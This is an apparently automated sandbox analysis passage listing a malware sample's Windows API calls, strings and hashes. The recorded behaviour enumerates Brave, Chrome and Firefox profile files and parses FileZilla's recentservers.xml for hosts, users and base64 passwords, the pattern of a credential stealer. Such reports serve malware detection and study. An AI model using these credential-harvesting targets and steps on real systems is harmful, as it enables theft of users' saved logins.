                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E737
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00E4E776
                                • DeleteFileA.KERNEL32(?), ref: 00E4E7D2
                                • StrCmpCA.SHLWAPI(?,016C88C8), ref: 00E4E7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E916
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E952
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: d61463a5894e464660d3acb0e0c2f7c4a196751ae60bd1c76542df3fb90bbaf0
                                • Instruction ID: 3c1f8c86fa5809fd3448ccaf1a2f79edbf553d1c7b2648bb0f2b19a86033df2a
                                • Opcode Fuzzy Hash: d61463a5894e464660d3acb0e0c2f7c4a196751ae60bd1c76542df3fb90bbaf0
                                • Instruction Fuzzy Hash: D0928E71A102059BCB21EF78EC89AAE77F9BF44318F44A528F945B7345DB34EC458BA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E518D2
                                • lstrlen.KERNEL32(\*.*), ref: 00E518DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E518FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E5190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E51947
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E51967
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E51981
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E519BF
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E519F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A4C
                                • lstrlen.KERNEL32(00E71794), ref: 00E51A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A80
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51AB4
                                • lstrlen.KERNEL32(?), ref: 00E51AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 00E51AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B19
                                • lstrlen.KERNEL32(016C8908), ref: 00E51B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B8F
                                • lstrlen.KERNEL32(00E71794), ref: 00E51BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51BC3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51C57
                                • lstrlen.KERNEL32(00E71794), ref: 00E51C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51C8B
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D21
                                • lstrlen.KERNEL32(00E71794), ref: 00E51D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D55
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E51DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DED
                                • lstrlen.KERNEL32(00E71794), ref: 00E51E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51E36
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51E68
                                • lstrlen.KERNEL32(016CD748), ref: 00E51E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51EB2
                                • lstrlen.KERNEL32(00E71794), ref: 00E51EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51EE3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51F15
                                • lstrlen.KERNEL32(016CE090), ref: 00E51F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51F5F
                                • lstrlen.KERNEL32(00E71794), ref: 00E51F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51F90
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51FC2
                                • lstrlen.KERNEL32(016BA938), ref: 00E51FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52036
                                • lstrlen.KERNEL32(00E71794), ref: 00E52048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52067
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E52073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52098
                                • lstrlen.KERNEL32(?), ref: 00E520AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E520D0
                                • lstrcat.KERNEL32(00000000,?), ref: 00E520DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52103
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5213F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E5214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E52176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E52181
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 933cdfa583765d3047ed37ffeb92ce0e497eb14e4d1af8b7fa802d47bb1ffb35
                                • Instruction ID: 2c554c18a1f00e439fd59f2f2ade1d77e7a2379a5d272cef56082150e8d7a56a
                                • Opcode Fuzzy Hash: 933cdfa583765d3047ed37ffeb92ce0e497eb14e4d1af8b7fa802d47bb1ffb35
                                • Instruction Fuzzy Hash: 6A62C130911616ABCB22AF64EC48AAF77F9AF44709F44642CFE45B3245DB35DD09CBA0
                                APIs
                                • wsprintfA.USER32 ref: 00E5392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E53943
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5396C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E53986
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E539BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E539E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E539F2
                                • lstrlen.KERNEL32(00E71794), ref: 00E539FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53A1A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53A26
                                • lstrlen.KERNEL32(?), ref: 00E53A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53A53
                                • lstrcat.KERNEL32(00000000,?), ref: 00E53A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53A8A
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E53ACE
                                • lstrlen.KERNEL32(?), ref: 00E53AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B36
                                • lstrlen.KERNEL32(00E71794), ref: 00E53B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B6A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53B9E
                                • lstrlen.KERNEL32(?), ref: 00E53BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 00E53BE0
                                • lstrlen.KERNEL32(016C88F8), ref: 00E53C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53C3C
                                • lstrlen.KERNEL32(016C8908), ref: 00E53C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53CB7
                                • lstrlen.KERNEL32(00E71794), ref: 00E53CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53CE8
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D79
                                • lstrlen.KERNEL32(00E71794), ref: 00E53D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53DAD
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53E43
                                • lstrlen.KERNEL32(00E71794), ref: 00E53E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53E77
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E53EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53F0D
                                • lstrlen.KERNEL32(00E71794), ref: 00E53F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53F41
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E53F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53F75
                                • lstrlen.KERNEL32(?), ref: 00E53F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 00E53FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53FE0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5401F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E5402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E540CE
                                • lstrcat.KERNEL32(00000000), ref: 00E540DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E542D9
                                • FindClose.KERNEL32(00000000), ref: 00E542E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: f34d08cd0acdcedb12c6f1d2a6dd5edc845b69d773013f5818b39c2a039f416b
                                • Instruction ID: fc62fc46cfd67d36e6c99f982668f6fe335c8860452253b1c2c56b76d28c712d
                                • Opcode Fuzzy Hash: f34d08cd0acdcedb12c6f1d2a6dd5edc845b69d773013f5818b39c2a039f416b
                                • Instruction Fuzzy Hash: A562D331D10616ABCB31AF78E849AAE77F9AF44349F44A528FD45B3240DB34DD09CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E569C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E56A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E56A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E56AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E56B35
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56B9D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 35aeb8bb02219b605dec28eb694806cabc13e9db079e8aa6e66aaa849c50993d
                                • Instruction ID: 9c807b782799c9feaa7a3a96d8de61a69d461802c163a68d727a3c6a0d525ad4
                                • Opcode Fuzzy Hash: 35aeb8bb02219b605dec28eb694806cabc13e9db079e8aa6e66aaa849c50993d
                                • Instruction Fuzzy Hash: 9342D170E10205ABCB21ABB4EC49A6E7BB9AF44319F44A828FE45F7241DB34DD058B60
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DBEF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E4DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC17
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E4DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC4C
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DC8F
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4DCD0
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E4DCF0
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E4DD0A
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E4DD1D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DD7B
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDA3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DDAF
                                • lstrlen.KERNEL32(?), ref: 00E4DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DE19
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DE6F
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DE7B
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DEBB
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DEE6
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DEF2
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFA5
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DFB1
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DFF4
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E022
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4E02E
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00E4E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E4E0E7
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E11F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E19F
                                • lstrcat.KERNEL32(00000000), ref: 00E4E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E4E1F9
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E22F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E4E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E261
                                • lstrcat.KERNEL32(00000000,016C88F8), ref: 00E4E269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E4E988
                                • FindClose.KERNEL32(00000000), ref: 00E4E997
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: f6a55c38e8e9ad7ff99a4ece14fd9e88681d10e1561f8d0de11b5339f57d67d8
                                • Instruction ID: 2f64a5b5f14b182bad2bd9b0032ac7d6abdc49f3029b44d7b115ad84f802d79b
                                • Opcode Fuzzy Hash: f6a55c38e8e9ad7ff99a4ece14fd9e88681d10e1561f8d0de11b5339f57d67d8
                                • Instruction Fuzzy Hash: BE526E71E112069BCB21EF78EC89AAE77F9AF44308F44A528F945B7345DB34DD058BA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E460FF
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46152
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46185
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E461B5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E461F0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E46233
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 56f74d336edd3a1493f1e6764aa81c0c2f8f0ec49d84150dd6f2a6eeb102cc43
                                • Instruction ID: b1d136fc5aaae4a7534939ab3a259b19afd14755360fb8716ba345fe9991aa19
                                • Opcode Fuzzy Hash: 56f74d336edd3a1493f1e6764aa81c0c2f8f0ec49d84150dd6f2a6eeb102cc43
                                • Instruction Fuzzy Hash: E3527C71E10215ABCB21EFA4FC49AAE77F9AF45358F14A428F945F7241DB34EC018BA1
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56B9D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56BCD
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56BFD
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00E56C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E56C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E56C5A
                                • lstrlen.KERNEL32(00000000), ref: 00E56C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E56CE2
                                • lstrlen.KERNEL32(00000000), ref: 00E56CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00E56D6A
                                • lstrlen.KERNEL32(00000000), ref: 00E56D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E56DF2
                                • lstrlen.KERNEL32(00000000), ref: 00E56E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E56E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E56EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E56EC9
                                • LocalFree.KERNEL32(00000000), ref: 00E56ED4
                                • lstrlen.KERNEL32(?), ref: 00E56F6E
                                • lstrlen.KERNEL32(?), ref: 00E56F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: 897a11266f1c2fb884e94b211494dfb5634b393935556747fa6af09191a2a926
                                • Instruction ID: 10e982bce3ab81842b71be038169cde1214f80432982037aed039664fb739e30
                                • Opcode Fuzzy Hash: 897a11266f1c2fb884e94b211494dfb5634b393935556747fa6af09191a2a926
                                • Instruction Fuzzy Hash: D202A370E11205AFCB21ABB4EC49A6E7BB9AF04719F546818FE85F7341DB34DD058B60
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54B7F
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E54B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BA7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E54BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E54BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
